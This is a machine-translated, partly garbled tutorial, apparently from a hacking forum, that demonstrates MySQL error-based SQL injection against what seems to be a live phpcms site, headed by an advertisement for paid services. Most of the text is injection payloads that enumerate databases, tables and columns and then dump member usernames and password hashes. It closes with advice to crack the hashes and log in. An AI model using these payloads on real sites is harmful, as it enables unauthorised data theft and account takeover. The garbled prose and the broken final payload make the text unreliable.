MySQL error Injection
Hello everyone, I am ~ Type QQ: 40497992
I undertake any website Security Detection designated website Developer Software Development Seo receiving trainees and Other Services
If it is not saved, it is like this. If it is not disordered, and 1 = 1 1 = 2, the normal page is returned.
Blind pig is also the no-play field 19
This injection code seems to be introduced on the Internet.
However, many tests fail.
Baidu has few.
Next I will demonstrate how to perform error injection.
Blow all databases
And (select 1 from (select count (*), Concat (select distinct Concat (0x7e, 0x27, Schema_name, 0x27, 0x7e) from information_schema.schemata limit 0, 1) from information_schema.tables limit 0, 1), floor (RAND (0) * 2) X from information_schema.tables Group
By X) A) and 1 = 1
Next we can find all the databases.
Blow up current database
And (select 1 from (select count (*), Concat (select Concat (0x7e, 0x27, Hex (cast (Database () as char )), 0x27, 0x7e) from
Information_schema.tables limit 0, 1), floor (RAND (0) * 2) X from information_schema.tables group by X) A) and 1 = 1
415256303332 this is the hex current database conversion. Let's see if arv032 is
Next
Violence table
And (select 1 from (select count (*), Concat (select distinct Concat (0x7e, 0x27, Hex (cast (table_name as char )), 0x27, 0x7e) from information_schema.tables where table_schema = 0x415256303332 limit 1, 1) from information_schema.tables limit 0, 1), floor (RAND (0) * 2) x
From information_schema.tables group by X) A) and 1 = 1
70687062625f61636c5f67726f757073 need to be converted
Phpbb_acl_groups: No one playing phpcms2008 knows it's phpcms_member. You can query it yourself. Just change the number.
Field explosion
And (select 1 from (select count (*), Concat (select distinct Concat (0x7e, 0x27, column_name, 0x27, 0x7e) from information_schema.columns where table_schema = 0x415256303332 and table_name = 0x706870636d735f6d656d626572 limit 0, 1) from
Information_schema.tables limit 0, 1), floor (RAND (0) * 2) X from information_schema.tables group by X) A) and 1 = 1
Username Password
Explosive content
And (select 1 from (select count (*), Concat (select Concat (0x7e, 0x27, phpcms_member.username, 0x27, 0x7e) from phpcms_member limit) from information_schema.tables limit), floor (RAND (0) * 2) X from information_schema.tables group by X) and
1 = 1
The password cannot be cracked. You just need to break the password and you will be able to log on to it. So, let's get the teaching material from here.